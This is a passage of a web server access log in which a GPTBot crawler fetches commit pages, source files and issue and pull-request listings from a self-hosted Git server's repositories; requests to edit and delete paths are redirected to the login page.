+[17/Feb/2026:19:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118424] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 113315] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15888] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11306] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9859] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 953] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17272] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fxref-gold_monitor_full.html" [Client 74.7.227.38] [Length 23953] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:30:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12022] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12020] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 11993] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10257] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:19:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11872] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11869] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 